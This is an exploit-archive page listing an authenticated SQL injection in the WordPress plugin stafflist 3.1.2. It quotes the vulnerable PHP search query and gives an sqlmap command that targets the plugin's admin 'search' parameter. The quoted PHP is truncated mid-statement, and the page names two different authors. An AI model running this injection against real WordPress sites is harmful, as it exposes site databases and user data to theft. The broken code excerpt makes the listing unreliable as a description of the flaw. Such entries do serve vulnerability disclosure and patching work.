WordPress Plugin stafflist 3.1.2 SQLi (Authenticated)

CVE Category Price Severity
CVE-2019-19498 CWE-89 Not disclosed High
Author Risk Exploitation Type Date
Mohammad Reza Espargham High Authenticated Remote 2022-05-29

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

WordPress Plugin stafflist 3.1.2 SQLi (Authenticated)
# Exploit Title: WordPress Plugin stafflist 3.1.2 - SQLi (Authenticated)
# Date: 05-02-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage:
# Version: 3.1.2
# Tested on: Firefox
# Contact me: h [at]

# Vulnerable Code:

$w = (isset($_GET['search']) && (string) trim($_GET['search'])!="" ?
$where = ($w ? "WHERE LOWER(lastname) LIKE '%{$w}%' OR
LOWER(firstname) LIKE '%{$w}%' OR
LOWER(department)  LIKE '%{$w}%' OR
LOWER(email) LIKE '%{$w}%'" : "");

# Vulnerable URL



sqlmap -u 'http://localhost:10003/wp-admin/admin.php?page=stafflist&search=test*'

# POC Image

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.